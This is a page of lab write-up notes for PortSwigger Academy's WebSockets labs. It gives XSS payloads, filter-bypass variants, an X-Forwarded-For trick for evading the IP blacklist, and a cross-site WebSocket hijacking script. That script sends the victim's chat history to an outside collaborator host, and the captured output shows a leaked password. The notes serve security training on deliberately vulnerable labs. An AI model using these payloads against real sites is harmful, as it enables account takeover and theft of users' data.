OffSec Notes
  • Offensive Security Notes
    • Linux/Unix
      • Checklist - PrivEsc
        • Related Links
        • Kernel Exploits
        • MYSQL
          • HEX
        • SUID
        • Relative Path in SUID Program
        • Writable /etc/passwd file
        • Writable script in /etc/crontab
        • Writable services
        • Sudo <=1.8.14
        • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
        • Docker
          • Docker Escape
        • davfs2
        • gcore
        • fail2ban
        • git
        • tar with wildcard
        • Exiftool
      • Limited Shell Escape
      • Wordpress
      • Apache Tomcat
      • Werkzeug Console PIN bypass
        • get_flask_pin.py
      • Java Object Deserialization
      • Redis RCE
      • mongodb
      • Postgres
      • Erlang - 4369
      • rsync - 873
      • Sendmail ClamAV
      • VNC Password Decryptor
    • Windows
      • Checklist - PrivEsc
        • MSSQL
        • PsExec.exe
        • Build Exploits
        • Unquoted Service Paths
        • SeImpersonateToken
        • SeRestorePrivilege
        • SeBackupPrivilege
        • Abuse GPO
        • Job with editable file
        • AlwaysInstallElevated
        • Misconfigured LDAP
        • GMSA
        • MS17-010
      • Useful PS Scripts
        • GetUserSPNs.ps1
        • Master MDF Hash Extraction
        • Spray-Passwords.ps1
      • Password Extraction
      • Office Macro
        • Microsoft Office
        • Open Office
      • Post Exploitation
    • Web
      • SQL Injection
        • mongodb 2.2.3
        • UNION BASED
          • MSSQL
          • Oracle
        • ERROR BASED
        • node.js
    • Nmap samples
    • Shells
      • node.js
      • msfvenom samples
      • Reverse Shells
      • Shellter
    • Enumeration
      • SMB
      • RPC
      • LDAP
    • Buffer Overflow
      • mona
      • fuzzer.py
      • exploit.py
      • bytearray.py
      • pattern_offset.rb
      • pattern_create.rb
    • Password Cracking
    • File Download
      • FTP
    • Port Forwarding
      • Dynamic Forwarding
    • Useful links
  • Blog
    • CRTO I & II
    • OSCP Preparation
    • New OSCP Exam vs Previous OSCP Exam
    • Movements in AD
    • PWK Lab vs PG Practice
  • PortSwigger Academy
    • Server-side topics
      • Authentication vulnerabilities
      • OS Command Injection
      • File Path Traversal
      • Business logic vulnerabilities
      • Information disclosure vulnerabilities
      • Access control vulnerabilities and privilege escalation
      • File upload vulnerabilities
      • Server-side request forgery (SSRF)
      • XML external entity (XXE) injection
    • Client-side topics
      • Cross-site scripting
      • Cross-origin resource sharing (CORS)
      • Cross-site request forgery (CSRF)
      • Clickjacking (UI redressing)
      • DOM-based vulnerabilities
      • Testing for WebSockets security vulnerabilities
    • Advanced topics
      • Insecure deserialization
      • Server-side template injection
      • Web cache poisoning
      • HTTP Host header attacks
      • HTTP request smuggling
      • OAuth 2.0 authentication vulnerabilities
      • JWT attacks
  • Walkthroughs
    • PG Practice
      • Linux
        • WARM UP
          • Bratarina
          • ClamAV
          • Exfiltrated
          • Hawat
          • Interface
          • Muddy
          • Pebbles
          • Twiggy
          • Wombo
        • GET TO WORK
          • Banzai
          • Cassios
          • Dibble
          • Fail
          • G00g
          • Hetemit
          • Hunit
          • Maria
          • Nappa
          • Nibbels
          • Nukem
          • Payday
          • Pelican
          • Readys
          • Roquefort
          • Snookums
          • Sorcerer
          • Splodge
          • Sybaris
          • Walla
          • Webcal
          • XposedAPI
          • ZenPhoto
          • Zino
          • QuackerJack
        • TRY HARDER
          • Clyde
          • Peppo
          • Sirol
      • Windows
        • WARM UP
          • Algernon
          • Compromised
          • Helpdesk
          • Internal
          • Kevin
          • Metallus
        • GET TO WORK
          • AuthBy
          • Billyboss
          • Craft
          • Fish
          • Hutch
          • Jacko
          • Nickel
          • Shenzi
          • Slort
        • TRY HARDER
          • Heist
          • Meathead
          • Vault
      • Template
  • About the author
Powered by GitBook
On this page
  • Lab: Manipulating WebSocket messages to exploit vulnerabilities
  • Lab: Manipulating the WebSocket handshake to exploit vulnerabilities
  • Lab: Cross-site WebSocket hijacking
  1. PortSwigger Academy
  2. Client-side topics

Testing for WebSockets security vulnerabilities

https://portswigger.net/web-security/websockets

Lab: Manipulating WebSocket messages to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time.

/chat -> Live chat

→ To server
{"message":"test"}
← To client
{"user":"You","content":"test"}

There is just client side protection with html encoding.

Send the request to the repeater -> Reconnect -> Send this payload:

{"message":"<img src=1 onerror='alert(1)'>"}

Lab: Manipulating the WebSocket handshake to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets. It has an aggressive but flawed XSS filter.

/chat -> Live chat

→ To server
{"message":"<img onclick='alert(1)'>test</img>"}
← To client
{"error":"Attack detected: Event handler"}

→ To server
{"message":"<iframe src='javascript:alert(0)'>"}
← To client
{"error":"Attack detected: JavaScript"}

→ To server
{"message":"<iframe src='javascRipt:alert(0)'>"}
← To client
{"error":"Attack detected: Alert"}

→ To server
{"message":"<iframe src='javascRipt:%61lert(0)'>"}
a -> url encoded

To bypass being in blacklist, we can add this header to request header:

X-Forwarded-For: (any value)

Lab: Cross-site WebSocket hijacking

This online shop has a live chat feature implemented using WebSockets.

To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim's chat history, then use this gain access to their account.

Request:
GET /chat HTTP/1.1
Host: acf21faf1e293867c0fd365700a700f3.web-security-academy.net
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Upgrade: websocket
Origin: https://acf21faf1e293867c0fd365700a700f3.web-security-academy.net
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=0eUxfWHWU1z3UUKb9xAUqwNhI0jPJe5f
Sec-WebSocket-Key: kLHi+hZ7ECII+qRH3585hQ==

Response:
HTTP/1.1 101 Switching Protocol
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: GQ79sfJLT+ljrMNywxhuWRsOD8Q=
Content-Length: 0

<form id="chatForm" action="wss://acf21faf1e293867c0fd365700a700f3.web-security-academy.net/chat">

There is no csrf protection in websocket handshake.

Exploit Server ->

Body:

  <script>
    var ws = new WebSocket('wss://acf21faf1e293867c0fd365700a700f3.web-security-academy.net/chat');
    ws.onopen = function() {
      ws.send("READY");
    };
    ws.onmessage = function(event) {
      fetch('https://gtdks02v6yt40r756at6r1o59wfm3b.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
    };
  </script>
Collaborator:

{"user":"Hal Pline","content":"No problem carlos, it's dqpl6qi78qaekjz7wh6d"}
PreviousDOM-based vulnerabilitiesNextAdvanced topics

Last updated 3 years ago